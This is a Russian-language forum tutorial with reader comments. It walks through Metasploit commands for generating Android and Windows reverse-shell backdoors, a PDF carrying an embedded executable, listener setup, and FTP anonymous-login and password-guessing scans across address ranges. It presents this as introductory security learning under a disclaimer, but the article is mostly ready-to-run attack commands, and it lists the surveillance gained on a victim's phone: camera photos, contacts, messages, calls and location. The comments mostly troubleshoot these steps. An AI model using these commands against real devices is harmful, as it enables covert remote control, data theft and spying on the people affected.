Статья Metasploit. Учимся вместе полезным фишкам.

Введение​

Рад приветствовать дорогих читателей! Я практически уверен, что все, кто читает данную статью, как минимум слышали про такой замечательный фреймворк как Metasploit. Данный фреймворк хранит в себе довольно богатую базу данных различных уязвимостей на любой вкус и цвет, которые только возможно проэксплуатировать. В этой статье хочу познакомить вас с некоторыми полезными и даже можно выразиться базовыми уязвимостями, которые здорово помогут вам в изучении сферы информационной безопасности и естественно в саморазвитии.

Дисклеймер: Все данные, предоставленные в данной статье, взяты из открытых источников, не призывают к действию и являются только лишь данными для ознакомления, и изучения механизмов используемых технологий.

Практическая часть​

Итак, конечно же все действия будут проводиться на моей любимой Kali Linux, тем более там этот фреймворк уже предустановлен, поэтому если что, можно сразу к командам приступать и не париться.

Бэкдор на андроид​

Здесь мы будем генерировать полезную нагрузку на андроид устройствах, делается всё довольно просто.

Мы вписываем вот такую команду для генерации:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test.apk

Что же означает данная команда? Давайте разберём!

• Часть строки, где написано android, указывает на операционную систему, под которую генерируется полезная нагрузка;
• meterpreter/reverse_tcp означает то, что подключаться к хосту данный бэкдор будет по протоколу tcp;
• lhost = 192.168.0.9 означает IP хоста, к которому будет подключаться бэкдор. Так как в рамках тестирования и ознакомления всё будет проходить в локальной сети, я ввёл свой локальный IP адрес. Для того, чтобы можно было подключиться из глобальной сети к вам, соответственно, нужен будет глобальный ваш IP адрес и при реверс инжиниринге бэкдора, его будет довольно легко выявить;
• lport = 4444 это собственно порт, по которому бэкдор будет обращаться к нам;
• И как не сложно догадаться, в строчке R > Test.apk задаётся название нашей полезной нагрузке.

После того как она сгенерировалась, у вас в каталоге появиться ваш apk файл. Теперь я закидываю бэкдор на тестовое устройство android, но перед тем как его закинуть, нужно подготовиться к ловле сессии в нашем фреймворке. Для этого нам нужно будет его запустить вот этой командой msfconsole.

После того как мы его запустили, нам нужно выбрать нашу полезную нагрузку, а для этого вписываем последовательно следующие команды:

use exploit/multi/handler

в данной команде мы выбираем эксплоит удалённого доступа

set payload android/meterpreter/reverse_tcp

здесь мы выбираем платформу и способ подключения

set lhost 192.168.0.9

задаём наш хост

set lport 4444

задаём порт

exploit

ну и собственно запускаем

Ну теперь я устанавливаю и открываю файл полезной нагрузки, и на экране моментально получаю сессию к моему устройству. Спектр возможностей удалённого доступа здесь весьма обширный. Можно сделать фотку через любую из камер телефона, лазить по директориям и скачивать какие-либо файлы, делать полный дамп номеров в телефонной книге, сообщений и звонков, узнать местоположение и многое многое другое.

Бэкдор на Windows.​

Ну здесь всё происходит впринципе аналогичным образом, нужно будет поменять лишь несколько строчек.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test2.exe

Команда так же весьма проста и понятна, поэтому переходим сразу к нашему фреймворку. Запускаем его msfconsole.

Ну и далее так же по очереди запускаем следующие команды

use exploit/mulit/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.9

set lport 4444

exploit

Далее аналогичным образом проверяем всё это дело на Windows по средством запуска и сессия готова.

Эксплоит в PDF​

Так же для фреймворка не составит труда сгенерировать PDF файл с полезной нагрузкой и аналогичным образом подключиться к нему. Давайте же приступим!

Здесь уже msfvenom нам не понадобиться, будем всё делать прямиком в метасплоите, поэтому снова его запускаем msfconsole.

Далее прописываем вот такие команды:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Здесь будет задействован эксполит, который будет встроен в PDF файл

set lhost 192.168.0.9

set lport 4444

set filename Test3.pdf

Здесь задаём имя нашему файлу

exploit

Ну и далее генерируется полезная нагрузка в виде файла PDF. Подключиться можно будет так же через multi/handler. То есть просто не выходя из консоли прописываем:

use exploit/multi/handler

set lhost 192.168.0.9

set lport 4444

exploit

Ну и ждём сессии.

Вход по ftp​

Так же наш фреймворк может спокойно просканировать диапазон IP адресов на возможность подключения к какому-либо с помощью ftp через логин Anonymous

Для этого мы запускаем наш фреймворк msfconsole.

И вводим следующие команды:

use auxiliary/scanner/ftp/anonymous

Выбираем наш сканер

set RHOSTS 192.168.1.200-254

Выбираем диапазон адресов для сканирования

set THREADS 55
run

Ну и собственно далее на экране у нас будут адреса на которых есть ftp и к которым можно подключиться через логин Anonymous без пароля и легко получить доступ.

Таким же образом можно и подбирать логин с паролем к диапазону адресов, для этого вводим следующие команды:

set RHOSTS 192.168.69.50-254
set THREADS 205
set USERNAME msfadmin
set PASSWORD msfadmin
set VERBOSE false
run

Ну и далее мы увидим адреса на которых есть ftp и к которым можно подключиться используя заданные вами логин и пароль для подбора.

Заключение​

Сегодня поведал вам немного о такой волшебной и удивительной штуке как Metasploit Framework. И у него весьма широкий спектр применений, через него можно выполнять практически все ключевые задачи в тестировании чего-либо на уязвимость, но опять же повторюсь, что данная статья не побуждает к злонамеренным действиям и несёт лишь ознакомительный характер.

 

[Дядюшка Рик]

Красава кхм кхм кхм дядюшка Рик одобряет

 

[piok]

Добрый день, я так скажем начинающий ИБ, которому нравится вся эта движуха
Подскажите пожалуйста, я уже пользовался msfvenom и такой вопрос.
Для чего использовать ключ (флаг) R > если существует ключ(флаг) -o которая позволяет также полезную нагрузку пихать в создаваемый файл? Можете пожалуйста немного рассказать в чём разница данных флагов?
Спасибо.

 

[B13]

Добрый день, я так скажем начинающий ИБ, которому нравится вся эта движуха
Подскажите пожалуйста, я уже пользовался msfvenom и такой вопрос.
Для чего использовать ключ (флаг) R > если существует ключ(флаг) -o которая позволяет также полезную нагрузку пихать в создаваемый файл? Можете пожалуйста немного рассказать в чём разница данных флагов?
Спасибо.

man msfvenom пробовали команду?

 

[piok]

man msfvenom пробовали команду?

Добрый день, спасибо за ответ. Да, выводит описание использования утилиты и описание флагов. Посмотрел внимательно, там нет описание на счет флага "R". Если смотреть на Example, то там пример использования утилиты с флагом "-o". Что на счет стрелки ">", то это я как понимаю выходной поток выполненной команды в файл. По типу ">>". Если не ошибаюсь конечно.
Спасибо.
С уважением, Евгений.

 

[bigboss3000]

Замени use exploit/mulit/handler на use exploit/multi/handler и не позорься, а так статья норм

 

[User17]

Замени use exploit/mulit/handler на use exploit/multi/handler и не позорься, а так статья норм

Благодарю,уже исправил

 

[Telly]

Приветствую! Ситуация следующая, создаю пейлоад по шагам выше, загружаю на свой телефон - выдает ошибку "Это приложение было создано для более ранней версии Android". Сессия не создается. Подскажите пожалуйста, как исправить?

Тестировал на 11 андройде, создавал на Kali (VB). Kali обновлял

 

[D3L1F3R]

Замени use exploit/mulit/handler на use exploit/multi/handler и не позорься, а так статья норм

а в чем позор?

 

[User17]

Приветствую! Ситуация следующая, создаю пейлоад по шагам выше, загружаю на свой телефон - выдает ошибку "Это приложение было создано для более ранней версии Android". Сессия не создается. Подскажите пожалуйста, как исправить?

Тестировал на 11 андройде, создавал на Kali (VB). Kali обновлял

Пейлоад создается к сожалению только на версии Android раньше 11ой

 

[User17]

а в чем позор?

Я случайно написал mulit вместо multi)

 

[D3L1F3R]

Я случайно написал mulit вместо multi)

Ну ошибся чуть-чуть, с кем не бывает.

 

[LinDis]

Подскажите пожалуйста вопрос, а речь ведь идет о Metasploit Framework или Metasploit Pro, почитал что только в коммерческой все работает,

ну и сам попробовал, по инструкции пишет Handler failed to bind to ip.ip.ip.ip:4321, так же не совсем понял какой порт нужно вписывать,

просветите кто вкурсе?

Спасибо!

 

[D3L1F3R]

Подскажите пожалуйста вопрос, а речь ведь идет о Metasploit Framework или Metasploit Pro, почитал что только в коммерческой все работает,

ну и сам попробовал, по инструкции пишет Handler failed to bind to ip.ip.ip.ip:4321, так же не совсем понял какой порт нужно вписывать,

просветите кто вкурсе?

Спасибо!

Написано же всё понятно, не знаю как вам помочь, ищите другую дыру